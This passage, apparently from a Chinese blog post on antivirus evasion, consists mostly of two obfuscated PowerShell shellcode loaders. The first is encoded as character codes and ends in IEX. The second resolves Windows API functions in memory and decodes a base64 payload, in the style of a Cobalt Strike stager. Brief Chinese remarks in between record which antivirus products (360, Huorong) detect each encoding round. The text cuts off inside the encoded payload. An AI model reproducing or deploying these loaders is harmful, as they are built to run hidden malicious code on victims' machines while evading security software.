, 90 , 87 , 90 ,115, 90 , 87,78, 48 ,97 , 87 , 57 ,117 , 76, 107,70 ,122 , 99,50, 86 , 116 ,89,109 , 120 ,53 ,84, 109,70 ,116 ,90,83 ,103, 110 ,85, 109, 86 ,109,98 ,71 ,86 , 106 ,100 ,71 ,86, 107 , 82 , 71 ,86,115 , 90,87,100, 104 , 100 , 71,85,110 , 75, 83,107,115 , 73,70 , 116 , 84,101 , 88 ,78, 48,90 ,87 ,48 , 117, 85 ,109, 86 ,109 ,98,71,86 ,106 ,100 , 71 ,108, 118,98, 105, 53 ,70 , 98 ,87,108 ,48,76,107 , 70,122 , 99 , 50 ,86 ,116 ,89 , 109, 120, 53 ,81, 110 ,86, 112, 98, 71 ,82 ,108 , 99,107, 70 ,106, 89,50,86 ,122 , 99 , 49 , 48 ,54, 79 , 108 ,74 ,49 , 98 , 105, 107, 117,82, 71,86 ,109, 97 ,87 ,53 , 108,82, 72 ,108, 117, 89,87 ,49,112 , 89,48,49,118 ,90, 72 , 86 ,115 , 90 , 83,103,110, 83 ,87 , 53 , 78 ,90, 87,49 ,118 , 99,110, 108,78 ,98 ,50 ,82,49, 98 ,71,85,110 , 76 ,67 ,65, 107,90 ,109,70, 115 , 99 , 50,85, 112, 76 , 107 , 82, 108,90 , 109, 108 , 117, 90, 86 , 82 , 53 ,99, 71, 85, 111, 74,48, 49, 53, 82 , 71 ,86 , 115 ,90, 87,100,104 , 100, 71 , 86, 85,101, 88 ,66, 108 , 74 , 121 , 119 ,103 ,74 , 48 ,78, 115 , 89,88, 78 ,122, 76 , 67 , 66 , 81 ,100 , 87, 74, 115 , 97 ,87,77,115 , 73 , 70, 78,108 , 89 , 87 , 120 ,108 ,90 , 67 ,119, 103 , 81 , 87 ,53, 122,97,85,78 ,115,89 , 88,78,122 ,76,67 , 66,66, 100, 88 , 82 ,118 , 81, 50, 120 , 104, 99 , 51,77,110 ,76 , 67, 66,98, 85 ,51, 108 ,122 , 100 ,71 ,86 , 116, 76 , 107 , 49,49 , 98,72, 82, 112 ,89,50 ,70 ,122 ,100,69 ,82, 108, 98,71 , 86,110 , 89,88, 82, 108 ,88, 83 ,107 , 75 , 67,83 , 82, 50, 89 , 88 ,74, 102 , 100, 72, 108, 119 , 90 , 86 , 57, 105,100,87, 108 ,115, 90,71 ,86 ,121 ,76 , 107,82 ,108 ,90, 109 ,108, 117 ,90 ,85 ,78 , 118,98 ,110 ,78, 48 ,99, 110 ,86 ,106,100, 71, 57,121 , 75 ,67 , 100, 83, 86, 70 , 78 , 119 ,90,87,78,112, 89 , 87, 120 , 79 , 89 , 87, 49,108, 76,67 , 66, 73, 97,87,82, 108,81,110 ,108 , 84,97 ,87 , 99, 115, 73, 70,66, 49 ,89 ,109 ,120 , 112,89, 121 , 99,115 , 73 ,70 , 116 ,84 ,101,88,78, 48 , 90,87,48 , 117, 85 ,109, 86,109 , 98, 71 , 86 , 106,100 , 71,108, 118,98 ,105 ,53, 68,89 , 87 ,120 , 115,97, 87 , 53,110,81 , 50 ,57, 117,100,109 , 86 ,117, 100 ,71 , 108,118, 98 , 110, 78,100 ,79,106, 112, 84, 100 ,71, 70 , 117, 90, 71 ,70, 121, 90 , 67 , 119 ,103,74 , 72, 90,104 , 99,108 ,57 , 119, 89, 88 , 74,104,98, 87 , 86 , 48 ,90 , 88 , 74, 122,75, 83 , 53, 84 ,90, 88 ,82 ,74, 98, 88,66,115, 90 , 87,49, 108, 98 ,110,82,104 , 100,71 , 108 ,118,98 , 107, 90 ,115,89, 87,100 , 122,75 , 67 ,100,83 , 100,87,53 , 48 ,97, 87,49,108 ,76 , 67,66 ,78, 89, 87 , 53 ,104 ,90 ,50 , 86, 107 , 74 ,121, 107 , 75 ,67 , 83 ,82 , 50 , 89, 88 , 74,102, 100 , 72 , 108,119 ,90, 86,57 , 105 , 100 , 87 ,108 ,115 , 90, 71, 86 , 121,76 ,107 ,82,108,90 , 109,108 ,117 ,90,85 ,49, 108 , 100,71 , 104 ,118 , 90,67 ,103, 110 , 83 , 87, 53,50, 98 , 50,116 ,108, 74 ,121, 119, 103,74 , 49 , 66 ,49,89 ,109 ,120 ,112 ,89, 121,119 ,103 , 83 ,71 ,108,107 , 90, 85,74,53,85, 50 , 108, 110 ,76,67 , 66, 79 ,90 ,88 ,100,84, 98,71 , 57, 48,76 , 67 , 66,87, 97, 88 , 74 , 48, 100 ,87 ,70,115,74 , 121 ,119,103 ,74, 72 ,90 , 104,99 ,108 ,57 ,121 ,90 , 88,82 , 49 ,99 ,109 , 53 ,102 ,100,72,108 , 119,90 , 83,119,103 , 74,72 ,90 ,104 , 99 ,108 ,57,119 , 89, 88 , 74 , 104 ,98 , 87 ,86,48,90 ,88 , 74, 122 , 75 , 83 , 53,84, 90 , 88 , 82 ,74 ,98 ,88 , 66, 115 ,90,87, 49,108,98,110, 82 ,104, 100,71 ,108, 118 , 98, 107 ,90, 115, 89, 87 ,100,122 , 75 ,67, 100 , 83 , 100 , 87 , 53 , 48 ,97 , 87 ,49, 108 ,76 ,67, 66 ,78 ,89,87,53 ,104 , 90,50,86 , 107, 74 ,121 , 107,75 , 67 ,103, 108,121, 90, 88,82 ,49 ,99,109,52 ,103,74 ,72, 90 ,104,99 , 108 ,57,48 , 101 ,88, 66 , 108,88 ,50 ,74 ,49 , 97, 87 ,120 , 107 , 90 , 88 ,73, 117,81,51, 74, 108, 89 ,88 , 82, 108 , 86,72,108, 119 , 90,83, 103 , 112 ,67,110, 48,75 ,67 , 108,116, 67 ,101 , 88,82 , 108 , 87 ,49, 49, 100,74, 72, 90 ,104,99, 108, 57 ,106 ,98,50 ,82 ,108 ,73 , 68 ,48 ,103 , 87 ,49 ,78, 53 ,99,51,82 ,108 ,98 ,83 , 53,68 , 98,50 , 53, 50 , 90, 88 ,74 ,48 ,88,84 , 111 ,54,82,110, 74,118,98, 85 , 74 , 104,99 ,50 ,85, 50 ,78 ,70, 78 , 48 ,99, 109, 108,117,90 , 121 , 103, 110 , 77, 122, 104 ,49 ,99, 85 , 108,53, 84 ,87 ,112 , 82 , 78 ,110 ,74, 72 ,82,88, 90 ,71,83 , 72,70 , 73, 82 , 86 ,82,120,83 , 69, 86,50 , 99 ,85 ,104 , 70, 77, 51, 70 , 71 , 82,85 , 120, 77 , 83,108 , 74 ,119 , 81, 108, 74,77,89 ,48,86 , 49 ,84,49, 66 , 73, 77,69, 112,109 ,83 , 86, 69 , 52 ,82 ,68 ,82, 49, 100,51, 86 , 74 ,100 , 86, 82, 67 , 77,68,78 , 71 ,77 , 72 , 70, 73 , 82 ,88, 112, 120, 82 , 48, 86 , 109 ,83, 88, 90, 80,98 , 49 ,107 , 120 ,100,87,48 ,48,77, 87 , 82,119, 83 ,88,90 ,79 , 101, 110 , 70 ,72 , 99,122, 100 ,120 ,83, 72, 78 , 69 , 83 , 88,90,69, 81,85 ,103, 121,99 , 87, 57 ,71, 78 , 109 , 100,112, 79 ,86,74,77 , 89 , 48,86,49, 84,49,65, 48 ,100 , 88,100, 49, 83, 88,86 , 82,89 , 110 ,99, 120 , 89, 108 , 104,74 , 82 ,106 ,100,105,82 ,48 , 89, 48,83, 70, 90 ,122 ,82,106 , 100 ,120 ,83,72 , 78, 73,83 , 88, 90, 67 , 82 , 110 ,70 ,68 , 79 , 87, 57 , 120 , 83, 72 ,77, 118 ,83,88, 90,68 ,98, 48,111,50,90,50 , 107 , 52 ,78, 110 ,66 ,117,81, 110 ,100 , 107,78 , 71,86 ,70, 83 ,106 ,90,108 , 87 ,69 ,120,106,100 , 122 , 78, 48 , 79,71 ,86 , 104,90,51 , 104, 53, 83,49, 89 , 114 , 85,122 , 65,120, 82, 49,90 , 53,84,107,120 ,87 ,82 , 88, 66, 79 , 85 ,50, 53, 107 , 84, 71, 73, 120 ,85, 85,90, 75 ,84 , 110, 111 ,121 ,82,88 ,82 , 52 , 77 , 71,82, 73 ,85, 106,66, 107 , 82 ,88,78, 97 ,90, 70, 90,120,82 ,84,78,81 ,89, 107 , 116 , 119, 101 ,85 ,49 , 113, 83 ,84, 78 ,110 ,85 ,122 , 90,117, 83, 110 ,108 , 84, 85,48 ,74,53 ,89, 50, 116 , 49 ,90, 69, 53 ,112, 84, 87,112 , 106 , 83, 69,53 ,77 ,90 ,69 ,116, 120 , 79 ,68, 86, 107 , 101, 106, 74 ,53,82, 107, 52 , 48, 82 , 88 , 90 ,71, 101, 70, 78, 53 ,84, 87, 104,90 , 78 , 109 , 82, 52,89 , 49, 104,71 , 100 , 50,78 , 89,84,107 , 120, 53, 83 , 70, 108,79,82, 48 , 53,54,77 , 110 , 70,49,86 , 50, 99, 48, 83,69 ,49, 84, 77 , 48, 104, 83, 77,70 ,78 , 107 ,101 , 72 ,100 ,107 , 86 , 88 , 78,80 ,83 , 108 ,82, 48, 87, 84,78, 81, 89 , 87, 48, 48 ,101 , 88 , 108 ,117 ,78 ,69 , 78, 74, 97 ,107, 108,52 , 84, 71, 78, 119 ,100 , 70 , 90 ,89 , 83, 106, 90 ,121 ,89 , 88, 108, 68, 99 , 69, 120, 112 ,90,87, 74 , 67, 90 , 110 , 82 ,54 , 77,110,70 , 49, 83 ,107,120,97, 90 ,48 ,111, 53,82,88,82 ,54 , 77,107 , 86, 48,101,68 , 66,84,85 ,49 , 74 , 53 ,90, 70 ,104,79,84 , 71, 120 ,73 ,86 , 69, 82, 76, 84 , 110 , 111, 121, 98,107, 78 ,78, 84 ,85 , 108 ,53 ,84, 87,69,49,82, 109, 86 ,86, 82 , 88 ,82 ,54, 83,51, 78, 112 ,83, 87, 112 , 74, 79,72 ,74, 120,83 , 87 , 108 ,78 ,97,110 ,107 , 50 , 97, 109,77,122 , 84,110 , 100, 78,86,84 , 65 , 52 ,86, 109 ,70 , 84,85 , 70,103 , 122,97 , 122, 70, 75 , 90 ,71, 116, 75 , 85 ,48, 70, 116 , 98,51,74, 73 , 78 ,71,115, 52, 85, 68 ,104, 120, 99,85 , 48 , 118 , 86, 87, 108 , 116, 100 ,49 ,82, 77, 83,106, 66, 85, 77,108 ,82, 90 , 75, 49 , 70, 116, 99 , 70,86 , 104,86 , 71 ,85, 48 , 86 , 68 ,90 ,77 , 84, 68 , 100,81 ,82, 108, 85, 53 ,89 ,48,82,69 ,97 ,86, 108 ,71, 99,121 ,116 ,120, 90, 109 , 112, 54 ,85 ,106 ,70 , 82 ,83 , 110 , 100, 54,90 , 72 ,77 ,118 , 85 ,69,70, 76 , 98, 50, 120,110,97,88, 111,122,78, 110 , 90, 72 , 78 ,68, 69, 48, 100,88,90, 50 , 77, 122 ,77 , 122,99 ,88 , 74 , 74 , 77 , 49, 112 ,82,85 ,109 , 120,70,84, 49, 108,114 , 85,107 , 100,85 ,86,109 ,78, 97 , 81 , 84 , 73, 49,84 ,86 ,100, 86, 99 ,70, 66 ,85, 77, 69, 108 ,78 ,82 , 110,99,119 ,86 , 69 ,70 , 51 , 100 , 69 , 70 ,85 ,82 ,84,86, 85, 85,87 , 120,107,83 , 49,70,86 , 79, 85,100 , 72, 81, 85 ,53, 49 ,89 ,48 ,100, 119 , 98, 85, 70 ,52,99,48 ,53, 70,101, 71 , 100 ,69, 90,69,86 , 119, 84 ,108,73, 119,101 , 70 , 86 , 86 , 81, 85, 53,48 , 90 , 72,100,78, 86 , 107 ,82 ,83,83,85,116 , 77 ,97, 87, 116 ,113 ,84 , 110,86 , 85, 90 , 122,74 , 89 ,79 , 68,100 , 75,101,109, 86, 81 , 101, 83,56 ,48 ,86, 87 ,108 , 53 , 90 , 49 ,90 ,67, 87, 85 , 70, 75, 85 , 110,78 ,82, 99 ,88,70 ,54, 101, 107 ,81, 121 ,90 ,110 ,78 , 90,79, 72,103, 118 ,79 , 68 ,66,48 , 98 ,110 , 66, 52 ,84 ,88, 112 ,88,75, 48 ,70, 72,99, 85 ,120,104, 78 ,107 , 69, 121 , 86,49,70 ,122 ,97 , 110 , 100,76 , 83 ,88 ,104 , 88 , 101 , 71 ,116 , 54 ,100,107 , 78 ,104 , 99, 71,90 , 52 ,99,69 ,103,120 , 82 ,88 ,74, 105,84 ,109, 99,122 , 100 ,109, 78,67 ,81 , 50 , 82,78 , 86,107 , 86 , 50, 84,84,82, 90, 78 ,88 ,82, 111, 89,107,57,50, 97,121, 115,114 , 77 , 85, 108 ,113,90, 71,112 ,86,83, 69 , 104, 52 ,90,85,86,68,85, 67 , 57,81,82 ,85,108,89,85, 50 , 120 , 78,99 ,67,116, 116, 97,86 , 99 ,49,85 , 87 ,104 ,111,78 ,109,52 ,120 , 84,70, 70 ,51, 86 , 109,116 ,48 , 101,68 , 90,77 , 97 ,68,99 , 122 , 77 , 48 ,119, 120, 77 , 87 , 120 ,52, 97, 86,104 ,121,87 , 109,90,49,82, 88 , 78 , 117, 99 ,110,85,51, 97 , 109, 111 ,122 ,100,71, 70 , 116, 99 , 69, 100 ,111 ,83,108, 78 ,84, 98, 48 , 116 , 97, 90 ,69 , 86, 113, 89, 86,100 , 104, 77,49 ,103 ,122,81, 48 , 120,116,82,109, 104, 109 , 85 , 110, 100, 106, 99, 86 ,86 , 82, 83, 108 ,108 , 69 ,101,69,78,87, 87 ,110 , 74 , 121 ,100 , 86,66, 77,78, 71 , 116 , 111, 97 , 107 ,73 , 50 ,99,84 , 100 ,117,98, 109 ,103 , 120, 98 , 51 , 74 , 90,87, 69 , 115, 49, 83, 85,74 ,87,86,87 , 112, 110 , 81, 88 ,100 , 87, 77 , 108 ,89, 49,90 , 72, 70,80, 100 , 122, 78 , 97, 100, 69, 74 ,97,85, 88, 73,114, 90, 122,74 , 109,79,68, 66, 49,84,122 , 99 , 114,83 , 109,53 , 119,97,121, 116 ,122 , 77,69 , 49 ,74, 79 ,87,86, 110, 99 ,68, 78, 48 , 81 ,106 , 85,122, 90 ,107,56 ,51, 85 , 85 ,53, 107 , 100,69, 108 , 117 , 99 ,108 , 99 , 53,86 , 70 , 111,52,86,48 ,108, 110,85, 48 ,49, 73, 97 , 69 , 57, 74 ,83 , 110 , 86, 107,97 ,69 , 112 , 104 ,77 ,48, 108 ,112,84, 107 , 119 , 119 , 78 , 87, 70 , 67,90, 71 ,82 ,54, 77, 108 , 78, 88,84 ,107 ,120, 74 ,101 , 107,49,113,83 , 84, 66 , 122, 97 , 107, 107 , 121 ,84,87 , 112 ,107, 82, 88 ,81,51 ,97 ,68,78,69,82, 122 ,78,81, 89,88 , 100, 116, 97, 85 ,49 , 113 ,83, 88 ,108 ,78 , 97,83, 116 , 117, 83 , 110 ,100 ,120, 99 ,49, 73,119,85 , 51, 108 ,78, 82, 69 , 108 ,53 ,84, 110,100 , 107, 86 , 88,78 , 52, 100 , 71 , 70 , 121 ,81 , 106,78 ,81 ,89 ,87, 48 , 48 ,77,87,90 ,115, 99 , 85 ,78,82 ,97 ,84,82 ,76,89 , 109,112, 87 ,99 ,49 ,111 , 51, 78,69, 49,49 ,83 ,122,78 , 48, 101, 109 ,78 , 71 , 101 , 70 , 70,79,82,87 ,104 ,74 ,85 ,85 ,82,83 ,82 , 86 ,78, 71 ,81 ,84, 66 , 84 ,82, 86 , 74 ,122 , 97 , 107 ,49 ,83, 90 ,68,70,88 ,100 , 122, 48, 57 ,74, 121, 107 ,75,67,109,90 ,118 , 99,105, 65 , 111 ,74 , 72 ,103, 103 ,80,83 ,65, 119,79,121 ,65 , 107, 101, 67,65 , 116 , 98, 72,81 ,103, 74, 72,90 ,104 ,99,108 ,57,106, 98 ,50 ,82, 108 , 76 ,107 ,78 , 118 , 100, 87, 53, 48 ,79 , 121, 65,107 , 101,67 ,115, 114 , 75,83 ,66 ,55,67,103, 107 , 107 ,100, 109 ,70, 121 ,88 ,50,78 ,118 ,90 ,71,86,98, 74, 72 ,104 , 100,73 , 68, 48 , 103 ,74, 72 ,90, 104 , 99,108 ,57,106, 98, 50, 82, 108, 87, 121,82 ,52,88,83 ,65 ,116,89, 110,104, 118 ,99,105 , 65 ,122, 78,81 ,112, 57,67, 103, 111 ,107 ,100, 109 , 70 , 121 , 88 , 51 , 90 ,104, 73, 68,48 ,103 ,87, 49, 78 , 53, 99 ,51 ,82,108 , 98 , 83, 53 ,83 ,100 ,87,53 ,48 , 97,87 ,49, 108 ,76 ,107,108 ,117, 100 , 71, 86 ,121 , 98 ,51,66,84 , 90,88,74 ,50,97, 87 ,78 , 108,99 ,121, 53,78, 89 , 88,74, 122, 97,71 , 70 ,115,88, 84 ,111, 54 , 82 ,50 ,86, 48 , 82, 71 ,86 , 115,90 ,87 , 100, 104, 100,71 , 86 ,71 ,98 ,51 , 74, 71 , 100, 87 , 53 ,106 , 100, 71 ,108 ,118 ,98, 108,66,118, 97, 87, 53 , 48, 90 , 88,73 , 111 , 75, 71 , 90,49,98,109, 78 , 102 , 90, 50 , 86, 48 ,88 ,51,66,121,98, 50 ,78 , 102,89,87, 82 , 107, 99 ,109 ,86, 122 , 99 ,121 ,66, 114 , 90,88,74, 117,90 , 87, 119, 122 ,77,105, 53,107,98 ,71 , 119, 103 ,86,109 , 108,121, 100, 72 ,86 ,104,98,69, 70 ,115 , 98 , 71 ,57, 106 , 75, 83 ,119, 103,75 ,71,90 ,49 , 98, 109 ,78 , 102 , 90,50, 86, 48 ,88,50,82 , 108,98 , 71, 86, 110, 89 ,88,82 ,108, 88,51,82 ,53 ,99 , 71 ,85,103 ,81 ,67 ,104, 98, 83 ,87,53 , 48 ,85, 72 , 82 , 121 , 88 ,83 , 119 ,103,87 , 49, 86,74, 98 , 110 ,81 ,122 ,77,108, 48, 115 , 73 , 70 ,116, 86 ,83 ,87, 53 , 48,77 ,122 , 74,100, 76,67, 66, 98 ,86,85 , 108,117 , 100, 68 ,77, 121, 88 ,83,107, 103 ,75,70 ,116 , 74 , 98 ,110,82, 81 , 100,72,74 , 100 ,75, 83 , 107,112,67 ,105,82, 50 ,89 , 88 , 74, 102 , 89 , 110 , 86, 109 ,90 , 109, 86 ,121,73,68, 48, 103,74,72,90 , 104,99 , 108,57 ,50,89 ,83, 53 ,74, 98,110 , 90, 118 , 97 , 50, 85, 111,87, 48, 108,117 , 100, 70, 66, 48,99,108 , 48,54, 79, 108, 112 ,108 ,99 ,109,56,115 , 73 ,67,82 , 50, 89,88 , 74,102, 89 ,50, 57 , 107 ,90 , 83, 53 ,77 ,90, 87, 53 ,110 , 100, 71, 103,115, 73, 68, 66, 52 , 77,122, 65 ,119,77, 67 , 119 ,103, 77, 72 , 103,48,77 ,67 , 107 , 75, 87 , 49,78 ,53,99 ,51 ,82,108, 98 , 83 , 53, 83 , 100, 87 , 53, 48 , 97 ,87,49 ,108,76, 107, 108,117 , 100, 71 , 86 , 121, 98, 51, 66 , 84 , 90 , 88 , 74 , 50 ,97 , 87, 78 , 108, 99 , 121,53 , 78, 89 , 88 , 74, 122 , 97,71, 70 ,115, 88, 84 ,111, 54 ,81 ,50, 57,119 ,101 , 83 ,103, 107 , 100 , 109,70 , 121 ,88 , 50, 78,118 ,90 ,71,85 , 115 , 73 , 68 ,65 , 115, 73,67,82 , 50 , 89 ,88 ,74 ,102 , 89, 110 , 86,109 , 90 , 109 ,86 ,121 , 76 , 67 , 65, 107 ,100 , 109 , 70,121,88 , 50 ,78,118 , 90 , 71,85 , 117 ,98,71 ,86 ,117, 90 , 51 ,82,111,75 , 81, 111 , 75 , 74 ,72 , 90,104, 99,108 , 57 ,121, 100 ,87, 53 ,116 ,90 ,83, 65, 57,73 , 70, 116 ,84, 101,88 ,78 ,48, 90,87 , 48,117,85 ,110,86,117 ,100 ,71 ,108 , 116 , 90, 83, 53 ,74, 98 ,110 ,82, 108 , 99 , 109 , 57 , 119,85 ,50 ,86 , 121, 100 ,109 , 108 ,106 ,90,88, 77 , 117, 84, 87 , 70 ,121, 99 , 50 ,104, 104 ,98,70 ,48 ,54 , 79, 107 , 100,108, 100 ,69 , 82 , 108,98 ,71, 86 , 110, 89 ,88 , 82 ,108 , 82 ,109 ,57 ,121, 82, 110,86 ,117 ,89 , 51,82 ,112,98, 50 , 53,81 ,98,50 ,108 ,117 , 100 ,71,86,121, 75,67,82,50, 89 , 88,74, 102 ,89,110 ,86 ,109 ,90 ,109, 86 , 121, 76, 67, 65 ,111,90 ,110, 86, 117 ,89 , 49,57 , 110, 90 ,88 , 82,102, 90,71, 86, 115 ,90 ,87, 100 , 104,100 , 71,86, 102 , 100, 72, 108 ,119,90 ,83, 66,65 ,75 ,70 , 116, 74 , 98, 110,82, 81,100,72 ,74,100, 75, 83 ,65,111, 87 ,49, 90 ,118 , 97 ,87 ,82,100,75, 83, 107 , 112 ,67, 105, 82, 50, 89, 88,74 ,102 , 99 ,110, 86 ,117,98, 87 ,85, 117 ,83,87 , 53 ,50 ,98, 50 ,116, 108, 75, 70 ,116 , 74, 98, 110, 82, 81,100 , 72 , 74 ,100 , 79, 106, 112,97, 90 ,88 , 74, 118,75 , 81, 61 ,61 , 10,39,64 ,10, 10 ,36,109 ,107,115, 101 ,99, 61,91 , 83 , 121,115,116, 101, 109, 46,84,101,120,116,46, 69,110 ,99,111,100 , 105,110,103 , 93 , 58, 58, 85 , 84,70 ,56 , 46 ,71,101,116 ,83 ,116,114 , 105 , 110 ,103 , 40,91,83, 121 , 115,116,101 , 109, 46, 67 ,111,110 ,118 ,101, 114 ,116 ,93 , 58, 58 , 70, 114, 111 , 109 , 66,97,115,101 , 54 ,52 ,83 ,116 , 114,105, 110,103,40, 36 , 68,111, 73, 116,41, 41 , 10, 10,73,102 , 32, 40,91,73, 110 , 116 , 80,116,114 , 93 ,58 , 58 ,115, 105, 122 , 101, 32,45 , 101 , 113 , 32 ,56,41,32 , 123 , 10 ,9 , 115 ,116 ,97 ,114,116,45 , 106,111,98,32,123, 32 ,112 ,97,114,97 ,109 , 40, 36,97 , 41 , 32, 73, 69,88,32,36 ,97 ,32 ,125 ,32 , 45, 82 ,117 ,110, 65 ,115 , 51 , 50 ,32 ,45 ,65,114 , 103, 117 ,109, 101,110 , 116, 32 , 36 , 109,107 ,115 ,101,99,32 ,124,32, 119, 97,105,116 ,45, 106 ,111, 98 , 32 ,124 ,32 ,82, 101 ,99 , 101 ,105,118 ,101 ,45, 74 ,111,98, 10,125 , 10 , 101, 108 ,115 , 101, 32, 123, 10,9,73,69,88 , 32 , 36, 109 ,107 , 115,101 , 99, 10 , 125 , 10) |FOREach-obJect{([CHAr] [int]$_) } ) -jOIN'' ) ``` 此时进行查杀某60过,某绒不过。 经过第一编码360绕过,火绒还是没有绕过,在进行第二次编码后某60过,某绒不过。 ```php . ( $PsHOME[4]+$psHOME[34]+'X')( " $( Sv 'OFS' '')"+ [stRinG]('83@101{116@45>83>116o114@105d99@116o77j111t100d101j32t45<86<101>114>115j105j111j110V32{50d10@10t36<68{111V73@116d32@61d32@64d39;10<102{117{110{99@116d105{111t110d32<102t117>110d99t95>103{101;116V95{112;114@111@99;95t97j100>100t114;101o115o115<32<123@10<9V80<97d114>97{109d32@40d36{118<97d114o95d109V111j100j117V108{101@44<32>36V118;97>114o95<112t114>111<99t101<100;117t114>101>41t9o9o10V9V36t118<97j114j95>117j110{115t97{102;101@95@110<97d116<105<118@101o95d109o101{116t104<111j100@115<32d61{32@40<91<65>112d112j68{111;109{97V105>110@93j58@58t67{117>114d114@101>110V116V68{111>109>97o105@110t46t71{101{116{65o115t115j101V109@98d108V105@101@115>40>41<32{124d32o87>104<101d114{101{45V79o98<106d101@99>116<32<123{32@36o95@46o71j108V111>98j97V108o65j115o115o101j109>98V108j121{67j97{99;104>101;32<45<65@110V100o32>36o95V46>76<111<99@97@116V105{111>110o46t83j112@108;105;116d40<39{92d92@39j41>91<45o49V93d46{69>113j117{97>108d115>40d39;83d121@115j116;101{109d46t100>108d108{39@41j32V125@41;46{71V101@116@84>121j112d101;40>39>77{105>99@114;111;115V111j102o116V46{87{105>110V51{50>46{85;110d115t97>102j101@78V97o116<105j118j101@77;101d116t104;111;100@115o39<41@10t9;36@118;97;114t95<103o112t97j32@61o32@36j118V97<114V95{117@110d115t97>102d101t95@110>97;116d105o118j101@95>109o101>116j104>111{100j115>46o71o101@116o77o101d116V104>111<100{40j39d71{101;116{80o114>111o99;65t100{100V114<101@115V115<39j44<32;91t84t121<112<101;91>93t93o32j64o40j39>83o121@115o116t101;109<46V82j117>110d116d105;109j101d46V73d110@116;101V114t111;112t83t101V114@118<105;99@101j115t46;72{97d110o100{108t101<82{101>102t39t44>32<39<115j116o114V105d110;103@39@41{41{10>9d114j101@116>117t114o110>32d36>118t97o114o95@103t112{97o46>73o110j118>111>107j101V40<36d110V117t108{108d44>32V64<40;91d83t121<115@116<101<109o46d82d117>110o116@105o109j101d46o73j110<116{101V114o111j112@83d101t114<118o105>99j101t115o46;72o97d110{100V108;101V82d101V102t93o40@78>101>119<45>79d98d106{101<99j116V32d83{121>115j116d101@109d46{82;117d110{116<105d109V101t46t73o110d116<101>114j111j112d83{101<114o118;105{99<101j115>46@72<97;110t100>108;101@82o101j102d40o40>78t101>119>45{79d98o106@101@99;116<32t73@110;116>80{116@114d41;44d32o40@36{118>97;114;95d117t110{115@97@102t101<95{110;97<116V105t118{101t95@109{101<116{104V111;100@115<46V71t101{116{77j101;116V104;111;100d40t39o71;101<116<77@111t100d117o108>101{72t97o110t100j108j101t39t41>41>46V73o110@118>111;107o101t40d36j110d117j108@108V44>32j64j40;36d118>97o114>95V109{111{100t117{108@101o41{41@41;41@44@32@36j118<97{114d95;112t114V111V99{101<100<117{114V101d41d41{10t125j10j10>102d117{110;99o116<105{111d110@32d102;117j110@99o95d103>101@116@95o100t101V108>101>103>97d116@101d95@116j121t112<101>32>123j10j9{80{97{114V97V109t32t40j10;9>9t91;80>97{114@97V109@101>116@101d114o40@80t111V115d105V116V105V111j110@32>61<32<48@44t32<77{97;110t100o97t116@111t114o121V32j61{32{36V84t114j117o101;41{93t32j91>84o121j112<101t91j93{93;32o36{118o97<114>95d112d97;114V97>109@101;116<101<114V115j44<10<9t9o91d80d97{114d97V109V101t116j101>114<40t80d111V115d105t116<105<111t110t32j61o32@49t41t93<32t91>84>121{112@101@93o32j36d118V97t114<95t114V101;116t117{114{110>95j116V121>112t101j32<61;32t91>86V111V105t100>93<10o9@41@10d10o9;36o118{97o114o95o116j121V112t101o95j98@117t105d108{100j101{114j32d61@32{91<65V112<112>68;111d109d97{105;110j93V58o58>67@117V114d114o101{110<116{68V111;109V97<105t110<46>68;101t102V105j110<101@68o121d110t97j109;105>99d65@115d115j101@109V98t108>121d40j40V78j101{119{45<79V98d106@101d99d116V32t83{121V115o116V101{109<46;82V101{102o108>101@99j116;105;111<110t46{65d115t115>101d109@98>108o121{78V97{109t101<40<39@82{101<102<108t101{99d116j101t100j68o101o108d101t103;97>116@101<39j41j41@44V32j91o83;121<115j116@101{109o46{82@101V102V108>101;99j116;105j111t110t46{69{109d105;116>46o65<115V115>101d109@98V108@121j66t117o105d108j100V101V114o65{99d99{101>115;115@93o58<58<82V117>110V41o46@68{101j102<105j110{101>68d121<110o97V109{105;99<77V111>100d117d108o101<40o39t73t110t77>101<109j111{114j121@77<111o100{117t108j101{39d44j32<36{102{97t108{115@101V41{46d68d101j102d105t110t101V84j121j112<101t40V39t77>121;68d101<108t101j103;97t116>101;84j121d112o101;39@44d32{39V67t108t97d115;115{44V32@80<117o98{108<105d99V44@32j83<101<97@108<101>100t44{32d65;110;115<105@67;108V97{115d115;44o32<65{117d116;111<67<108d97o115>115d39V44@32d91o83o121<115V116>101;109<46o77o117V108<116<105o99V97t115V116>68o101j108{101V103<97t116@101>93<41>10o9{36o118V97;114<95o116t121d112t101{95t98<117<105d108V100V101t114>46j68V101t102;105V110{101t67j111{110t115{116<114d117{99V116@111j114<40>39t82V84{83<112;101{99d105o97{108d78@97;109@101<44V32@72d105<100t101>66<121>83d105<103>44t32<80t117d98V108d105@99j39d44j32@91j83@121o115<116<101<109>46;82t101t102@108V101o99d116<105o111d110t46<67;97d108>108o105;110d103{67>111d110t118d101@110<116d105;111@110<115o93>58V58>83o116@97>110d100>97d114d100>44V32<36>118V97j114;95;112;97>114V97V109{101<116<101d114>115<41{46{83;101d116@73{109d112;108@101t109t101<110{116t97o116d105@111o110d70@108V97<103{115{40o39@82@117@110{116d105V109@101V44o32{77;97V110V97V103{101o100@39@41d10>9t36<118>97o114<95V116{121{112o101@95d98>117d105;108<100@101{114j46>68{101j102j105V110t101>77;101o116>104{111>100;40V39j73d110d118;111o107o101<39{44o32{39>80o117<98j108@105j99j44d32o72d105d100t101o66;121V83<105<103d44V32{78@101;119t83d108t111j116@44t32t86;105t114j116V117o97;108V39@44<32;36o118@97;114V95<114<101{116;117;114<110t95t116{121d112j101@44o32t36;118<97@114@95t112t97;114>97;109t101j116t101V114j115j41d46<83>101j116{73j109j112;108o101>109<101;110t116@97V116@105j111<110V70V108{97<103<115d40V39>82<117j110o116t105<109d101j44{32;77>97{110t97j103d101<100{39V41@10{10o9{114d101o116;117>114j110@32t36o118>97;114j95V116;121{112V101d95{98<117V105t108;100;101>114{46{67j114V101o97V116t101t84j121j112d101o40<41@10<125@10@10o91>66V121d116j101<91{93@93d36{118{97{114>95V99V111@100V101t32d61>32j91V83o121>115@116o101@109{46>67j111>110@118j101j114V116o93V58d58t70t114o111@109{66o97d115;101j54V52V83<116t114j105>110<103t40{39{51;56o117<113t73<121d77{106@81<54j114<71<69o118>70@72@113t72V69d84V113@72t69d118@113>72j69{51t113o70t69{76@76<74t82V112;66t82>76d99>69@117;79;80<72;48d74{102V73o81o56t68>52@117<119t117d73;117j84V66;48@51V70@48{113@72;69o122@113<71o69@102t73j118t79t111d89t49>117{109{52<49@100;112<73<118>78@122j113d71j115V55j113o72t115j68{73j118@68;65{72{50V113>111d70d54<103V105V57o82;76{99<